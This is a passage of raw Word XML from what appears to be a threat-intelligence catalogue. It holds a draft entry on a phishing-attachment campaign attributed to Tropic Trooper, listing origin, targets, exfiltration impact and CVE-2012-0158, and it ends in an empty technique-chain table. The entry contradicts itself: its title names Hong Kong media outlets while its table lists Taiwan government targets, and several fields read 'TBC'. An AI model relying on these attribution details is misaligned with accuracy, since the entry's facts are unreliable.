      <w:bookmarkStart w:id="137" w:name="_Toc153480907"/>
      <w:r>
        <w:t xml:space="preserve">T1566.001 - </w:t>
      </w:r>
      <w:r w:rsidRPr="005B4630">
        <w:t>China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="137"/>
    </w:p>
    <w:p w14:paraId="7FB3C63E" w14:textId="77777777" w:rsidR="00324B94" w:rsidRDefault="00324B94" w:rsidP="00324B94">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324B94" w:rsidRPr="002D1D50" w14:paraId="77FA73E3" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EC92219" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="002D1D50" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="752DF05F" w14:textId="61F7CDF2" w:rsidR="00324B94" w:rsidRPr="002D1D50" w:rsidRDefault="004430D6" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E6B5DCD" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="00387DCC" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004430D6" w:rsidRPr="00B857D7" w14:paraId="00BAB561" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DE89F7E" w14:textId="77777777" w:rsidR="004430D6" w:rsidRDefault="004430D6" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="303B5973" w14:textId="313ABFF4" w:rsidR="004430D6" w:rsidRDefault="004430D6" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Tropic Trooper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FE35EDA" w14:textId="77777777" w:rsidR="004430D6" w:rsidRPr="00387DCC" w:rsidRDefault="004430D6" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324B94" w:rsidRPr="00B857D7" w14:paraId="501CB622" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E3CB364" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="007328DE" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59BADAC5" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="007328DE" w:rsidRDefault="00324B94" w:rsidP="00504678">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7067906E" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="00387DCC" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324B94" w:rsidRPr="00B857D7" w14:paraId="0ED0DCC8" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78841F06" w14:textId="77777777" w:rsidR="00324B94" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FA71FDD" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="007328DE" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>China</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="497E56B3" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="00387DCC" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324B94" w:rsidRPr="00B857D7" w14:paraId="04081672" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DB2B0A1" w14:textId="77777777" w:rsidR="00324B94" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B2F17BC" w14:textId="0E29F165" w:rsidR="00324B94" w:rsidRDefault="00CF1215" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Taiwan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68AE5BE4" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="00387DCC" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324B94" w:rsidRPr="00B857D7" w14:paraId="72F54AF4" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4551B402" w14:textId="77777777" w:rsidR="00324B94" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A738B16" w14:textId="60AC6EAC" w:rsidR="00324B94" w:rsidRDefault="00C662D5" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Government</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DABCD71" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="00387DCC" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324B94" w:rsidRPr="00B857D7" w14:paraId="46DE0B61" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="474969DA" w14:textId="77777777" w:rsidR="00324B94" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="666EA9BC" w14:textId="497AF8F3" w:rsidR="00324B94" w:rsidRDefault="009C542D" w:rsidP="009C542D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Exfiltration (confidentiality)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E726D76" w14:textId="25C74568" w:rsidR="00324B94" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324B94" w:rsidRPr="00B857D7" w14:paraId="2D22F282" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F6754F7" w14:textId="77777777" w:rsidR="00324B94" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A336192" w14:textId="77777777" w:rsidR="00324B94" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CVE-2012-0158</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3032EFB6" w14:textId="77777777" w:rsidR="00324B94" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324B94" w:rsidRPr="00B857D7" w14:paraId="32F82F81" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30BE3374" w14:textId="77777777" w:rsidR="00324B94" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BC8B4E6" w14:textId="77777777" w:rsidR="00324B94" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DD0812C" w14:textId="77777777" w:rsidR="00324B94" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00740ADA" w:rsidRPr="00B857D7" w14:paraId="489907C5" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32331FEF" w14:textId="77777777" w:rsidR="00740ADA" w:rsidRDefault="00740ADA" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E5CD203" w14:textId="77777777" w:rsidR="00740ADA" w:rsidRDefault="00740ADA" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79F1B426" w14:textId="77777777" w:rsidR="00740ADA" w:rsidRDefault="00740ADA" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Reference </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00740ADA" w:rsidRPr="00B857D7" w14:paraId="06568C81" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31CBF50C" w14:textId="77777777" w:rsidR="00740ADA" w:rsidRDefault="00740ADA" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78849716" w14:textId="77777777" w:rsidR="00740ADA" w:rsidRDefault="00740ADA" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11A51D02" w14:textId="77777777" w:rsidR="00740ADA" w:rsidRDefault="00740ADA" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324B94" w:rsidRPr="00B857D7" w14:paraId="5E06C597" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76433C61" w14:textId="77777777" w:rsidR="00324B94" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C705140" w14:textId="77777777" w:rsidR="00324B94" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2015</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BE9A90A" w14:textId="77777777" w:rsidR="00324B94" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324B94" w:rsidRPr="00B857D7" w14:paraId="73C86A89" w14:textId="77777777" w:rsidTr="00740ADA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44D70D58" w14:textId="77777777" w:rsidR="00324B94" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0927BA7F" w14:textId="77777777" w:rsidR="00324B94" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="542A3F3A" w14:textId="77777777" w:rsidR="00324B94" w:rsidRDefault="00324B94" w:rsidP="00504678">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6AABFB22" w14:textId="77777777" w:rsidR="00324B94" w:rsidRPr="00AC7A85" w:rsidRDefault="00324B94" w:rsidP="00324B94"/>
    <w:p w14:paraId="62CE40CF" w14:textId="77777777" w:rsidR="00324B94" w:rsidRDefault="00324B94" w:rsidP="00324B94">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="440"/>
        <w:gridCol w:w="1587"/>
        <w:gridCol w:w="2282"/>
        <w:gridCol w:w="648"/>
        <w:gridCol w:w="647"/>
        <w:gridCol w:w="556"/>
        <w:gridCol w:w="861"/>
        <w:gridCol w:w="3435"/>
      </w:tblGrid>
      <w:tr w:rsidR="00454A18" w:rsidRPr="002D1D50" w14:paraId="27AD71F8" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1D992FE6" w14:textId="77777777" w:rsidR="00454A18" w:rsidRDefault="00454A18" w:rsidP="00454A18">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="18CF5736" w14:textId="77777777" w:rsidR="00454A18" w:rsidRPr="002D1D50" w:rsidRDefault="00454A18" w:rsidP="00454A18">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2291" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="65515F1F" w14:textId="06CE7A3A" w:rsidR="00454A18" w:rsidRPr="002D1D50" w:rsidRDefault="00454A18" w:rsidP="00454A18">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tropic_Trooper_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7DBB246A" w14:textId="77777777" w:rsidR="00454A18" w:rsidRPr="002D1D50" w:rsidRDefault="00454A18" w:rsidP="00454A18">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0F70F5E4" w14:textId="01032EFC" w:rsidR="00454A18" w:rsidRPr="002D1D50" w:rsidRDefault="00454A18" w:rsidP="00454A18">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7B95D735" w14:textId="722E38C9" w:rsidR="00454A18" w:rsidRPr="002D1D50" w:rsidRDefault="00454A18" w:rsidP="00454A18">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3E6E12FA" w14:textId="77777777" w:rsidR="00454A18" w:rsidRPr="002D1D50" w:rsidRDefault="00454A18" w:rsidP="00454A18">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1FDACB14" w14:textId="77777777" w:rsidR="00454A18" w:rsidRPr="002D1D50" w:rsidRDefault="00454A18" w:rsidP="00454A18">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324B94" w:rsidRPr="002D1D50" w14:paraId="749513DF" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
